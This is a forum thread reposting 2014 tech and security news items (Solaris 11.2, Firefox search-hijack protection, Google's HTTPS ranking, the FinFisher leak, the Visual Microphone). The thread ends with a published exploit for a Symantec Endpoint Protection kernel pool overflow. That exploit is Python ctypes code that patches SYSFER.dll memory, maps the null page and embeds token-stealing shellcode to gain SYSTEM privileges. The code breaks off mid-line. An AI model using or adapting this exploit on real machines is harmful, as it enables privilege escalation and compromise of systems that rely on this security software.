Nytro

[h=1]Oracle Solaris 11.2 Officially Released[/h] August 7th, 2014, 08:21 GMT · By Silviu Stahie Oracle Solaris, one of the most widely deployed UNIX operating systems, which delivers critical cloud infrastructure with built-in virtualization, simplified software lifecycle management, cloud scale data management, and advanced protection for public, private, and hybrid cloud environments, has finally reached version 11.2. It's hard to quantify just how many changes and improvements have been made for this release, but there are quite a lot. The developers have gathered numerous modifications and new features since the previous version, 11.1, which was made available back in October 2012. “Oracle Solaris 11.2 accelerates your ability to deploy enterprise cloud computing with an efficient, secure, compliant, open, and affordable cloud platform. Engineered for cloud and deeply integrated with Oracle Database, Java, and Oracle Applications, Oracle Solaris 11.2 is more than an operating system (OS).” “It combines a complete OpenStack distribution, application-driven software-defined networking (SDN), zero-overhead virtualization, enterprise-grade disaster recovery, and high availability with an enterprise-class OS to simplify and secure the delivery of mission-critical cloud services. Oracle Solaris is a strategic element in Oracle's growing systems business,” reads the official website. According to the changelog, the distribution is now able to provide an efficient, secure, compliant, open, and affordable path to enterprise cloud computing, the OS is open cloud platform engineered for large-scale enterprise cloud environments, it features OpenStack, it comes with application-driven SDN technology, clustering, and zero-overhead virtualization, and it should make the IT's transformation to enterprise-grade cloud simple, fast, and affordable. Also, the Unified Archive template and OpenStack distribution should provide a fast setup for a cloud environment, the compliance overhead is reduced with built-in compliance reporting and simple resolution instructions, built-in virtualization that delivers scalability at low cost has been implemented, multi-tier recovery from outages and disasters is available, and support for more than 30 common enterprise application suites, including new modules for Oracle's JD Edwards Enterprise One, is provided. Oracle took over the development of Solaris back in 2012 and they have turned the distribution into a powerful OS aimed at companies and firms with big infrastructure needs. This is a closed source proprietary operating system, but some bits from it do have open source components, which are provided on the official website. A comprehensive list of changes, features, and updates can be found in the official announcement. You can download Oracle Solaris 11.2 right now from Softpedia, but you will also have to create an account with Oracle in order to get the download links. Sursa: Oracle Solaris 11.2 Officially Released

[h=1]Russian Ministry of Health to Replace Microsoft and Oracle Products with Linux and PostgreSQL[/h] August 7th, 2014, 09:09 GMT · By Silviu Stahie The Russian government is considering the replacement of Microsoft and Oracle products with Linux and open source counterparts, at least for the Ministry of Health. Russia has been slapped with a large number of sanctions by the European Union and the United States, which means that they are going to respond. One of the ways they can do that is by stopping the authorities from buying Microsoft licenses or prolonging existing ones. According to a report published on gov.cnews.ru, the official website of the Russian government, the Ministry of Health intends to abandon all the proprietary software provided by Oracle and Microsoft and replace it with open source software. This information is revealed by the Deputy Director of the IT department of Ministry of Health, Roman Safronov. He says that this has been actually planned since 2011, with the creation of the federal services of the Unified State Health Information System (EGISZ). “Given the many transactions coming EGISZ scale and limited budget, we decided that we can not afford to pay for a license tens of millions of rubles a year,” says Safronov. “A large part of the Unified State Health Information System (EGISZ) works on open source software, "from the Linux terminal stations, the linux / unix servers to application software and databases (PostgreSQL, and others.)". Situation Centre of Ministry of Health is also built on open source software,” he continues. The migration to open source from Microsoft and Oracle products is not something that can be done rapidly. In fact, the advanced 2015 date seems to be way too early and it's doubtful that they will be able to migrate all of their systems to other databases and operating systems. Even if this decision of the Russian government seems to follow a trend from other administrations in Europe, it has little in common with them. Cities like Toulouse in France and Munich in Germany have worked for many years to cut costs by adopting open source solutions, but the Russians are just trying to punish American corporations and leverage their own kinds of sanctions. It's unclear whether this decision will also be implemented in other areas of the government, but that remains to be seen. Also, Roman Safronov says that they will use PostgreSQL instead of Oracle, but he fails to mention what Linux distribution will be used to replace Windows. They might try to use something built in Russia, but there are no major Linux operating systems developed in that country that can do the job. Sursa: Russian Ministry of Health to Replace Microsoft and Oracle Products with Linux and PostgreSQL

Firefox 34 to introduce better search hijacking protection By Martin Brinkmann on August 7, 2014 in Firefox - Last Update: August 7, 2014 0 Advertisement Mozilla plans to improve user protection against unwanted search engine manipulations in Firefox by changing the way search engine information are stored in the browser. Firefox users have to cope with unwanted changes made to the browser more than other users. When it comes to unwanted add-on and toolbar installations, and changes made to the homepage or search provider, it is Firefox that is affected the most by it. There are several reasons for that, one being that it is easy enough to manipulate certain preferences to modify homepage or search engine values. Search hijacking is a big issue right now. This usually happens during the installation of programs that ship with adware offers. If you are not careful, you may end up with a different search provider that is used for all browser searches from that moment on. While it is easy enough to switch back if you know how to, it can be a very frustrating experience, especially if the change is made regularly by a program running in the background. Mozilla plans to improve user protection against search hijacking in several ways in the near future. One effort will be integrated into Firefox 34. The preference browser.search.selectedEngine, which is currently being used to determine the default search engine in Firefox, will be removed as a consequence. The value of the preference will be saved in the file search-metadata.json instead which is stored in the user's profile directory. Since it would be relatively easy to replace that file, a hash is added to it as well which is generated from the profile directory name. This way companies cannot just replace the file with their own copy as the hash won't match. While there may be options to get around this, for instance by generating the hash as well, it is improving protection nevertheless. So what is happening if a program tries to change the default search provider in Firefox 34 or newer? The change is blocked. I installed the Ask Toolbar on my system and explicitly allowed it to change the default search provider. While the installation went fine, the search provider was not changed. The most likely explanation is that it was not changed because it tried to modify the preference browser.search.selectedEngine which is not in use anymore. Mozilla plans to make additional changes to improve the user experience further. Search engines added by add-ons will for instance be removed automatically if the add-on gets uninstalled in Firefox, and new guidelines will be added to make search engine changes using an API which in turn displays a notification to the user if the change should be made. Drawbacks The change will benefit users who run into troubles regularly in regards to third-party initiated changes of the browser's default search provider. The change introduces on major drawback, as it won't be possible anymore to sync the selected search engine with other installations. Search engines will still get synchronized if Firefox Sync is enabled, but it is up to the user to change the default search engine manually on all systems manually. The second drawback is that programs won't be able to change the search engine anymore even if the user wants that to happen. There are not any statistics for this and I think it is unlikely that many users want those changes to happen on their system but there may be some who do. Conclusion Mozilla has to do something about unwanted changes made to the configuration of the Firefox browser. It is unclear if the new way of storing the default search engine will be sufficient, or it if will only provide users with temporary protection until companies find a way to manipulate the search engine again. The feature is already integrated in the most recent Nightly versions of Firefox. Mozilla plans to ship it with Firefox 34. (via Sören) Sursa: Firefox 34 to introduce better search hijacking protection - gHacks Tech News

HTTPS as a ranking signal Posted: Wednesday, August 6, 2014 Tweet Cross-posted from the Webmaster Central Blog Security is a top priority for Google. We invest a lot in making sure that our services use industry-leading security, like strong HTTPS encryption by default. That means that people using Search, Gmail and Drive, for example, automatically have a secure connection to Google. Beyond our own stuff, we’re also working to make the Internet safer more broadly. A big part of that is making sure that websites people access from Google are secure. For instance, we have created resources to help webmasters prevent and fix security breaches on their sites. We want to go even further. At Google I/O a few months ago, we called for “ ” on the web. We’ve also seen more and more webmasters adopting HTTPS (also known as HTTP over TLS, or Transport Layer Security), on their website, which is encouraging. For these reasons, over the past few months we’ve been running tests taking into account whether sites use secure, encrypted connections as a signal in our search ranking algorithms. We’ve seen positive results, so we’re starting to use HTTPS as a ranking signal. For now it's only a very lightweight signal—affecting fewer than 1% of global queries, and carrying less weight than other signals such as high-quality content—while we give webmasters time to switch to HTTPS. But over time, we may decide to strengthen it, because we’d like to encourage all website owners to switch from HTTP to HTTPS to keep everyone safe on the web. In the coming weeks, we’ll publish detailed best practices (we’ll add a link to it from here) to make TLS adoption easier, and to avoid common mistakes. Here are some basic tips to get started: Decide the kind of certificate you need: single, multi-domain, or wildcard certificate Use 2048-bit key certificates Use relative URLs for resources that reside on the same secure domain Use protocol relative URLs for all other domains Check out our Site move article for more guidelines on how to change your website’s address Don’t block your HTTPS site from crawling using robots.txt Allow indexing of your pages by search engines where possible. Avoid the noindex robots meta tag If your website is already serving on HTTPS, you can test its security level and configuration with the Qualys Lab tool. If you are concerned about TLS and your site’s performance, have a look at Is TLS fast yet?. And of course, if you have any questions or concerns, please feel free to post in our Webmaster Help Forums. We hope to see more websites using HTTPS in the future. Let’s all make the web more secure! Posted by Zineb Ait Bahajji and Gary Illyes, Webmaster Trends Analysts Sursa: Google Online Security Blog: HTTPS as a ranking signal

Report: Android finally surpasses iOS in web traffic By Derek Walter Follow Greenbot | Aug 5, 2014 12:00 PM Android’s dominant market share is paying off in another area: mobile web traffic. According to a report from Net Marketshare, mobile devices powered by Android accounted for a larger share of browser usage than iPhones and iPads in July. The analytics company tracks usage data for operating systems, browsers, search engines, and other technologies. netmarketshare.com July web data traffic shows Android phones and tablets with a small lead over those powered by iOS. The edge was less than half a percentage point: iOS web usage in July was 44.19 percent while Android devices reported 44.62 percent. This marks the first time Google's mobile OS has surpassed Apple's in total worldwide mobile web usage, but it's only one report from one company. However, the data was nearly a full percentage point jump from June, when Android accounted for 43.75 percent of Internet traffic. The gain for Android was higher when the data was compared with the numbers from the beginning of the year, with such phones and tablets accounting for only 39 percent of traffic. Sursa: Report: Android finally surpasses iOS in web traffic | Greenbot

[h=1]Long Range Wireless Sensors for the Home-Area-Network[/h] July 19, 2014 By Matt Terndrup In the near future, we will all reside in households that contain hundreds of little devices intertwingled together with an easily connectable and controllable network of sensors. For years, projects have been appearing all around the world, like this wireless sensor system that anyone can build. [Eric] hopes his work will help bring the truly expansive Home-Area-Network (HAN) into fruition by letting developers build cheap, battery-powered, long-range wireless sensors. His method integrates with the pluggable OSGI architecture and home automation platform openHAB along with using an Arduino as the lower power, sensor node that is capable of utilizing many types of cheap sensors found online. [Eric]’s tutorial depicts a few examples of the possibilities of these open-source platforms. For instance, he shows what he calls a ‘Mailbox Sentinel’ which is a battery-powered mail monitoring device that uses a Raspberry Pi to play the infamous, and ancient AOL sound bite “you’ve got mail.” It will also send an email once the postman cometh. In addition, he lists other ideas such as a baby monitoring sentinel, a washer/dryer notification system, water leak detectors, and security implementations that blast a loud alarm if someone tries to break in. All of this potential for just around $20. The key to making this project work, as [Eric] states, is the MQTT binding that ties together the Ardiuno and openHAB platform. This allows for simple messages to be sent over the Ethernet connection which is often found in IoT devices. So all you developers out there go home and start thinking of what could be connected next! Because with this system, all you need is a couple of ten-spots and an internet plug, and you have yourself a strong foundation to build on top of. The rest is up to you. This open, connected device is [Eric's] entry for The Hackaday Prize. You can see his video demo after the break. We hope this inspires you to submit your own project to the contest! Sursa: Long Range Wireless Sensors for the Home-Area-Network

McAfee: Google and Facebook’s Erosion of Privacy is a Tragedy Phil Muncaster UK / EMEA News Reporter , Infosecurity Magazine Outspoken anti-virus pioneer John McAfee has hit out at Google, Facebook and the host of privacy infringing applications dominating the modern age, and called on users to lobby their politicians to better protect digital freedoms. Keynoting at the annual BSides event in Las Vegas this week, McAfee managed to cover everything from his long-running dispute with the Belizean government to yoga and smoking on live TV. However, the topic he explored in most depth was the “tragedy” of firms like Google and Facebook knowing “virtually everything about you”. “How did this happen to us? It happened because we did not give a shit. It happened because we allowed a technology to run away with itself and because it made our lives easier and more convenient we did not care,” argued McAfee. “You have lost your privacy and you’re losing more of it every day. With the loss of privacy you’re losing your freedom, and without freedom is there humanity? Is there any humankind that is not free?” There was also time for a not-so-subtle dig at Google executive chairman Eric Schmidt’s famously dismissive response to privacy fears, “If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place." “Many would have us believe that if you have nothing to fear – if you’re doing nothing wrong – why should you care about privacy?” said McAfee. “The truth is this. Without privacy, can’t there be freedom?” McAfee went further, urging users to “stand up for themselves” and contact their Congressional representatives with the simple message: “I want my privacy back”. The founder of the eponymous AV company, now a part of chip giant Intel, has a vested interest in talking about such issues. His new company, Future Tense Security Systems has produced a free software “awareness” product which allows users to understand what permissions they have given to their apps. Another project, Chadder, is advertised as a private messaging platform. The majority of McAfee’s 40 minute keynote was devoted to audience questions. In response to one he claimed the AV industry is dead. “It’s based on an algorithm which can’t possibly keep up with the malicious workings of human beings today,” he argued. “I think we’ve got to start taking responsibility ourselves for the things we are doing. If we’re not willing to sacrifice a little bit of our convenience to not use apps that we have to have because they provide a direct link through which God-knows-what can come in, then there’s nothing technology can do to help us.” Sursa: McAfee says Google and Facebook’s Erosion of Privacy is a Tragedy - Infosecurity Magazine

FireEye and Fox-IT have partnered to provide free keys designed to unlock systems infected by CryptoLocker. Please provide your email address [1] and an encrypted file [2] that has been encrypted by CryptoLocker. This portal will then email you a master decryption key along with a download link to our recovery program that can be used together with the master decryption key to repair all encrypted files on your system. Please note that each infected system will require its own unique master decryption key. So in case you have multiple systems compromised by CryptoLocker, you will need to repeat this procedure per compromised system. Notes: [1] Email addresses will not be used for marketing purposes, nor will they be in any way stored by FireEye or Fox?IT. [2] You should only upload encrypted files that do not contain any sensitive or personally identifiable information. Link: https://www.decryptcryptolocker.com/

Gamma FinFisher hacked: 40 GB of internal documents and source code of government malware published on Andre Meister am 06. August 2014, 17:23 in Überwachung / Keine Kommentare “Try before you buy! One free license key for the first taker!” A hacker claims to have hacked a network of the surveillance technology company Gamma International and has published 40 gigabytes of internal data. A Twitter account has published release notes, price lists – and source code. Malware researchers and human rights activists welcome the publication, Gamma itself refuses to comment. This is an english adaption of two German articles. Thanks to Anna and Kilian for their help on the translation. Yesterday, we reported that the Twitter account @GammaGroupPR is publishing internal documents of the offensive computer intrusion product suite FinFisher/FinSpy, developed by Gamma and marketed and sold to state actors around the world. A post on reddit with the same username claims: […] a couple days ago when I hacked in and made off with 40GB of data from Gamma’s networks. I have hard proof they knew they were selling (and still are) to people using their software to attack Bahraini activists, along with a whole lot of other stuff in that 40GB. Here’s a torrent of all the data. Please download and seed. Here’s a twitter feed where I’m posting some of the interesting stuff I find in there, starting off slow to build up rather than just publish all the worst shit at once. If this Tweet is accurate, the hacked server is finsupport.finfisher.com, but it was since taken down. Unfortunately, the Dropbox-accuont with the original Torrent-file is “temporarily disabled”, but we are happy to provide a mirror. (Magnet-Link) The following are some of the files that were leaked on the Twitter account: “FinSpy – the professional botnet C&C solution” Portable Document Format (PDF): Cyber solutions for the fight against crime (17 pages) FinSpy 3.00 – User Manual – 2011-06-05, by Stephan Oelkers (127 pages) FinSpyPC 4.51 (HotFix for 4.50) Release Notes – 2014-04-14 (14 pages) FinSpyMobile 4.51 Release Notes – 2014-04-14 (15 pages) Microsoft Excel: FinFisher Price list 2014 – 2013-12-16 (updated: 2014-01-24) FinFisher Products Extended Antivirus Test (Anti-Virus Results FinSpy PC 4.51) – 2014-04-04 Device Tests FinSpyMobile 4.51 – 2006-09-16 (updated: 2014-04-15) FinSploit Sales There is a zip archive “FinSploit Sales” with a text file and three videos. The README contains those Frequently Asked Questions: Q: Can you supply a list of the current exploits? A: Yes but we need to do this individually for each request as the available exploits change on a regular basis. Q: Can we name the supplier? A: Yes you can mention that we work with VUPEN here Q: How does the customer get the exploits? A: They will get access to a web-portal where they can then always download the available exploits Q: Can this be used to deploy other trojans than FinSpy? A: Yes, any exe file can be sent Q: Which Operating Systems do you cover? A: Currently the focus is on Windows Vista/7. Some exploits for XP are also available. At the moment there are no 0 day exploits for OSX, Linux or mobile platforms. Really close: Martin Münch (Gamma) and Chaouki Bekrar (VUPEN) last month. Source: @cBekrar. This further proves the close collaboration between german/swiss/british Gamma/FinSpy and the french exploit seller VUPEN. The limitation to Windows 7 and Vista seems outdated. Two years ago, we reported that FinSpy Mobile also exists for all common mobile systems (iOS, Android, BlackBerry, Windows Mobile and Symbian). And last year, internal slides showed that FinSpy was able to infect all major operating systems (Windows, Linux and Mac OS X). If the newly published files are unmodified, they were created in October 2011, only a few days before ISS (Intelligent Support Systems) World in the US,. Most likely this was the status for presenting it at this “Wiretappers Ball“, and since then the product range was expanded to all common systems. Here are the three videos that show how vulnerabilities in three common software types are exploited: Source code of FinFly Web Another trophy is source code of FinFly Web, which found its way the code hosting platform GitHub. A company brochure that was published by WikiLeaks as part of the SpyFiles three years ago describes it like this: FinFly Web is designed to provide remote and covert infection of a Target System by using a wide range of web-based attacks. FinFly Web provides a point-and-click interface, enabling the Agent to easily create a custom infection code according to selected modules. Target Systems visiting a prepared website with the implemented infection code will be covertly infected with the configured software. A video advertises its features, and other documents describe provide more details. Malware researcher: “This guy is a malware developer” Raphaël Vinot, a malware researcher from France, has since decompiled a few java class files to make the code more understandable. He told netzpolitik.org (as himself, not his employer): Yesterday, I just had a very fast look at the repository and decompiled a few class files. The website is a testing instance to show to the new clients what they can do. I don’t think there is anything particularly interesting in that code, but it is a very good platform to show to non-technical people what attackers can do and how it will look like in the wild. I am personally going to reuse it at cyptoparties. The most interesting thing I found is in the file SearchEnhancer.java, which references the website www.codito.de. This redirects to www.mushun.de, which in turn lists Martin J. Muench in the imprint. MJM used to work for Gamma GmbH and acted as a speaker for the company. This guy is a malware developer and has to be treated like one. I really hope the clients are going to be revealed soon-ish, but most especially detections and indicators so it will be possible to share them with companies and other partners in order to detect FinFisher in the wild. FinFisher: “We don’t want to comment on this” “@avast_antivirus was irresponsibly interfering with law enforcement investigations by detecting FinSpy 4.50? Already yesterday we called up the Munich telephone number on finfisher.com and asked them for comment. At first, they denied being FinFisher, but then admitted it, albeit refusing to comment. Today we called them again, and again the answer was: “We don’t want to comment on this.” This time around, they greeted us with “FinFisher here” instead of denying it at first. When we asked, if we could speak to Martin Muench, we were rejected again: netzpolitik.org: Is Mr. Muench available? I already talked to him before. FinFisher GmbH: You already talked to him before? netzpolitik.org: Yes, but that was a while ago. Maybe last year. FinFisher GmbH: Mr Muench is not in the house. netzpolitik.org: Not at all or just at the moment? FinFisher GmbH: […] netzpolitik.org: ? FinFisher GmbH: Definitely not now. We have heard rumors that Martin ‘MJM’ Muench does not work for Gamma/FinFisher anymore. If you have more information on this (or anything else on the topic): don’t hesitate to contact us! Human rights activist: “such techniques are not lawful” Eric King, Deputy Director of the UK-based charity that defends and promotes the right to privacy across the world, told netzpolitik.org: In the last few years, a spotlight has been shone on the secretive practice of government hacking. This completely unchecked area of intelligence collection amounts to some of the most intrusive forms of surveillance any government can conduct. FinFisher are one of the most aggressive companies to try and supply the worlds law enforcement agencies with such tools, but without public debate, and clear laws authorising their use – such techniques are not lawful. Privacy International and EFF have both filed lawsuits on behalf of activists who have been targeted by the Ethiopian government using FinFisher. Many more activists will have been targeted by repressive regimes, and surveillance companies like FinFisher must take responsibility for their role in that repression, and stop their damaging practices. Security researcher: “generally considered criminal behavior” Yesterday, Jacob Appelbaum, computer security researcher and hacker, told netzpolitik.org: This document release shows that those responsible for protecting our security are aware of bypasses for commonly advocated security technologies. As an example, anti-virus bypass, which is a well known issue – is compounded by the desire for certain attackers to ensure that bypassses are not fixed but rather exploited. There is a dual role here and the overall security of our computers is being subverted by this dual role – to protect and the desire to infect protection loses in service of attacking people. Furthermore, we see that these government customers are aware that FinFisher is defrauding companies and their users by abusing their branding, logos and names – something that is generally considered criminal behavior when done by any other actor on the internet. These exploitable issues in commonly used software – in our everyday telephones, personal computers and in our infrastructure – are problems that need to be fixed; rather than fixing them, they are being exploited and are left vulnerable for any attacker, regardless of motive. Today, Jacob Appelbaum adds: This larger release of 40GB of data raises many interesting questions – impersonating companies such as RealPlayer, Adobe, and others has been well documented by third parties; we now have further evidence of such attack vectors as well as the government officials who were party to this kind of fraud for their own benefit. We hope, that there are many more interesting things to be found in the 40 GB torrent download. Please post your findings in the comments. Sursa: https://netzpolitik.org/2014/gamma-finfisher-hacked-40-gb-of-internal-documents-and-source-code-of-government-malware-published/

No, si cum va functiona acel program? Prin magie?

[h=1]Focus Your Ears with The Visual Microphone[/h] August 6, 2014 By Adam Fabio Leave a Comment A Group of MIT, Microsoft, and Adobe researchers have managed to reproduce sound using video alone. The sounds we make bounce off every object in the room, causing microscopic vibrations. The Visual Microphone utilizes a high-speed video camera and some clever signal processing to extract an audio signal from these vibrations. Using video of everyday objects such as snack bags, plants, Styrofoam cups, and water, the team was able to reproduce tones, music and speech. Capturing audio from light isn’t exactly new. Laser microphones have been around for years. The difference here is the fact that the visual microphone is a completely passive device. No laser or special illumination is required. The secret is in the signal processing, which the team explains in their SIGGRAPH paper (pdf link). They used a complex steerable pyramid along with wavelet filters to obtain local pixel motion values. These local values are averaged into a global motion value. From this global motion value the team is able to measure movement down to 1/1000 of a pixel. Plenty of resolution to decode audio data. Most of the research is performed with high-speed video cameras, which are well outside the budget of the average hacker. Don’t despair though, the team did prove out that the same magic can be performed with consumer cameras, albeit with lower quality results. The team took advantage of the rolling shutter found in most of today’s CMOS imager based consumer cameras. Rolling shutter CMOS sensors capture images one row at a time. Each row can be processed in a similar fashion to the frames of the high-speed camera. There are some inter-frame gaps when the camera isn’t recording anything though. Even with the reduced resolution, it’s easy to pick out “Mary had a little lamb” in the video below. We’re blown away by this research, and we’re sure certain organizations will be looking into it for their own use. Don’t pull out your yet though. Foil containers proved to be one of the best sound reflectors. Thanks [Zach]! Sursa: Focus Your Ears with The Visual Microphone

[h=1]Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow[/h] # Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow# http://www.offensive-security.com # Tested on Windows 7 # http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/ # Authors: Matteo 'ryujin' Memelli & Alexandru 'sickness' Uifalvi <at> offensive-security.com from ctypes import * from ctypes.wintypes import * import struct, sys, os, time ntdll = windll.ntdll kernel32 = windll.kernel32 TH32CS_SNAPPROCESS = 0x02 PROCESS_ALL_ACCESS = 0x1fffff FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 NULL = 0x0 MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 PAGE_EXECUTE_READWRITE = 0x00000040 SystemExtendedHandleInformation = 64 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_INVALID_HANDLE = 0xC0000008 STATUS_SUCCESS = 0 PVOID = c_void_p HANDLE = c_void_p class LSA_UNICODE_STRING(Structure): """Represent the LSA_UNICODE_STRING on ntdll.""" _fields_ = [ ("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", LPWSTR), ] class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" _fields_ = [ ("Object", PVOID), ("UniqueProcessId", ULONG), ("HandleValue", ULONG), ("GrantedAccess", ULONG), ("CreatorBackTraceIndex", USHORT), ("ObjectTypeIndex", USHORT), ("HandleAttributes", ULONG), ("Reserved", ULONG), ] class SYSTEM_HANDLE_INFORMATION_EX(Structure): """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" _fields_ = [ ("NumberOfHandles", ULONG), ("Reserved", ULONG), ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), ] class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" _fields_ = [ ("Name", LSA_UNICODE_STRING), ("Reserved", ULONG * 22), ] class PROCESSENTRY32(Structure): _fields_ = [ ("dwSize", c_ulong), ("cntUsage", c_ulong), ("th32ProcessID", c_ulong), ("th32DefaultHeapID", c_int), ("th32ModuleID", c_ulong), ("cntThreads", c_ulong), ("th32ParentProcessID", c_ulong), ("pcPriClassBase", c_long), ("dwFlags", c_ulong), ("szExeFile", c_wchar * MAX_PATH) ] Process32First = kernel32.Process32FirstW Process32Next = kernel32.Process32NextW def header(): """Print exploit header""" print "[+] Sysplant 0x0222084 Kernel Pool Overflow" print "[+] Product: Symantec Endpoint Protection" print "[+] Authors: Matteo 'ryujin' Memelli & Alexandru 'sickness' Uifalvi <at> offensive-security.com" def getLastError(): """Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), NULL, buf, sizeof(buf), NULL): print "[-] " + buf.value else: print "[-] Unknown Error" def signed_to_unsigned(signed): """Convert signed to unsigned integer""" unsigned, = struct.unpack ("L", struct.pack ("l", signed)) return unsigned def get_type_info (handle): """Get the handle type information.""" public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() size = DWORD(sizeof(public_object_type_information)) while True: result = signed_to_unsigned( ntdll.NtQueryObject( handle, 2, byref(public_object_type_information), size, None)) if result == STATUS_SUCCESS: return public_object_type_information.Name.Buffer elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(public_object_type_information, size.value) elif result == STATUS_INVALID_HANDLE: return None else: raise x_file_handles("NtQueryObject.2", hex (result)) def get_handles(): """Return all the processes handles in the system atm.""" system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() size = DWORD (sizeof (system_handle_information)) while True: result = ntdll.NtQuerySystemInformation( SystemExtendedHandleInformation, byref(system_handle_information), size, byref(size) ) result = signed_to_unsigned(result) if result == STATUS_SUCCESS: break elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(system_handle_information, size.value) else: raise x_file_handles("NtQuerySystemInformation", hex(result)) pHandles = cast( system_handle_information.Handles, POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ system_handle_information.NumberOfHandles) ) for handle in pHandles.contents: yield handle.UniqueProcessId, handle.HandleValue, handle.Object def getppid(mypid=None, rec=False): """ Get Parent Process """ pe = PROCESSENTRY32() pe.dwSize = sizeof(PROCESSENTRY32) if not mypid: mypid = kernel32.GetCurrentProcessId() snapshot = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) result = 0 try: have_record = Process32First(snapshot, byref(pe)) while have_record: if mypid == pe.th32ProcessID: if rec: result = getppid(pe.th32ParentProcessID, False) break else: result = pe.th32ParentProcessID break have_record = Process32Next(snapshot, byref(pe)) finally: kernel32.CloseHandle(snapshot) return result def getSysFerPointer(phandle): """ Get child_block and child_block_size variable addresses """ csysfer = create_string_buffer("SYSFER.dll", len("SYSFER.dll")) hsysfer = kernel32.LoadLibraryA(addressof(csysfer)) if not hsysfer: print "[-] LoadLibrary Failed!" sys.exit() print "[+] SYSFER Base address %s" % hex(hsysfer) cscb = create_string_buffer("child_block", len("child_block")) sysfer_child_block = kernel32.GetProcAddress(hsysfer, addressof(cscb)) if not sysfer_child_block: print "[-] GetProcAddress Failed!" sys.exit() print "[+] SYSFER!child_block ptr @ %s" % hex(sysfer_child_block) cscbs = create_string_buffer("child_block_size", len("child_block_size")) sysfer_child_block_s = kernel32.GetProcAddress(hsysfer, addressof(cscbs)) if not sysfer_child_block_s: print "[-] GetProcAddress Failed!" sys.exit() print "[+] SYSFER!child_block_size ptr @ %s" % hex(sysfer_child_block_s) child_block = c_ulong(0) read = c_ulong(0) # Read child_block address res = kernel32.ReadProcessMemory(phandle, sysfer_child_block, byref(child_block), sizeof(c_ulong), byref(read)) if res == 0 or res == -1: print "[-] ReadProcessMemory Failed!" getLastError() sys.exit() # Read child_block_size child_block_s = c_ulong(0) res = kernel32.ReadProcessMemory(phandle, sysfer_child_block_s, byref(child_block_s), sizeof(c_ulong), byref(read)) if res == 0 or res == -1: print "[-] ReadProcessMemory Failed!" getLastError() sys.exit() print "[+] SYSFER Pointer retrieved successfully!" return child_block, child_block_s, sysfer_child_block, sysfer_child_block_s def craftSysFerData(phandle, sysfer_child_block, sysfer_child_block_s, evil_child_block, evil_child_block_size): """ Replace SysFerData to control memcpy source buffer """ wrote = c_ulong(0) ecb = struct.pack("<L", evil_child_block) cecb = create_string_buffer(ecb, 0x4) print "[+] Patching %x with %x" % (sysfer_child_block, evil_child_block) res = kernel32.WriteProcessMemory(phandle, sysfer_child_block, addressof(cecb), 0x4, byref(wrote)) if res == 0 or res == -1: getLastError() sys.exit() ecbs = struct.pack("<L", evil_child_block_size) csrc = create_string_buffer(ecbs, 0x4) print "[+] Patching %x with %s" % (sysfer_child_block_s, hex(evil_child_block_size)) res = kernel32.WriteProcessMemory(phandle, sysfer_child_block_s, addressof(csrc), 0x4, byref(wrote)) if res == 0 or res == -1: getLastError() sys.exit() print "[+] SYSFER.DLL patched successfully!" def allocShellcode(): """ Allocate OkayToCloseProcedure ptr and shellcode """ baseadd = c_int(0x00000004) null_size = c_int(0x1000) tokenstealing = ( "\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80" "\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04" "\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10" "\x00" ) OkayToCloseProcedure = struct.pack("<L", 0x00000078) sc = "\x42" * 0x70 + OkayToCloseProcedure # 83C6 0C ADD ESI,0C # C706 0A000800 MOV DWORD PTR DS:[ESI],8000A # 83EE 0C SUB ESI,0C sc += "\x83\xC6\x0C\xC7\x06\x0A\x00\x08\x00\x83\xEE\x0C" # RESTORE TypeIndex sc += tokenstealing sc += "\x90" * (0x400-len(sc)) ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, POINTER(c_int), c_int, c_int] dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) if dwStatus != STATUS_SUCCESS: print "[+] Error while allocating the null paged memory: %s" % dwStatus getLastError() sys.exit() written = c_ulong() alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000004, sc, 0x400, byref(written)) if alloc == 0: print "[+] Error while writing our junk to the null paged memory: %s" %\ alloc getLastError() sys.exit() def allocInput(phandle, evil_child_block_size): """ Allocate the source buffer in the parent process """ v = kernel32.VirtualAllocEx(phandle, 0x0, evil_child_block_size, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 8654c580 040c0090 ef436f49 00000000 0000005c # 8654c590 00000000 00000000 00000001 00000001 # 8654c5a0 00000000 0008000a quota = "\x00\x00\x00\x00" header = "\x90\x00\x0c\x04\x49\x6f\x43\xef\x00\x00\x00\x00\x5c\x00\x00\x00" header += "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" header += "\x00\x00\x00\x00" TypeIndex = "\x00\x00\x08\x00" offset = "\x45" * (evil_child_block_size-len(header)-len(TypeIndex)-\ len(quota)) overflow = offset + 